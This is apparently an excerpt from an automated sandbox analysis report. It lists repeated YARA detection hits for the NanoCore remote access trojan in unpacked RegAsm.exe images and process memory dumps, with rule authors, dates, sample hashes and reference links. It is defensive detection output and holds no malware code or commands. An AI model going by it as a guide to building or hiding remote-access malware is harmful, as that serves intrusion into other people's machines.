Source: 3.2.RegAsm.exe.56a4629.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.RegAsm.exe.56a4629.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegAsm.exe.56a4629.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.2.RegAsm.exe.2ffb670.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.RegAsm.exe.2ffb670.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 12.2.RegAsm.exe.2ffb670.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegAsm.exe.56a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.RegAsm.exe.56a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegAsm.exe.56a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 12.2.RegAsm.exe.3fdff7c.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 12.2.RegAsm.exe.3fdff7c.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 12.2.RegAsm.exe.3fdff7c.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegAsm.exe.2dc5cb4.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.RegAsm.exe.56a0000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.RegAsm.exe.56a0000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegAsm.exe.56a0000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 12.2.RegAsm.exe.3fe45a5.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 12.2.RegAsm.exe.3fe45a5.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 12.2.RegAsm.exe.3fe45a5.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.RegAsm.exe.3ddff7c.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.RegAsm.exe.3ddff7c.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegAsm.exe.3ddff7c.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegAsm.exe.3ddff7c.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.RegAsm.exe.3ddff7c.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegAsm.exe.3ddff7c.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegAsm.exe.3de45a5.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.RegAsm.exe.3de45a5.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegAsm.exe.3de45a5.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.RegAsm.exe.5650000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.RegAsm.exe.5650000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegAsm.exe.5650000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 12.2.RegAsm.exe.3fdff7c.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 12.2.RegAsm.exe.3fdff7c.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 12.2.RegAsm.exe.3fdff7c.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000003.00000002.513552281.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
